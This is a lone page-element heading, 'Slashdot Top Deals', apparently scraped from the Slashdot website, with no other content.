Slashdot Top Deals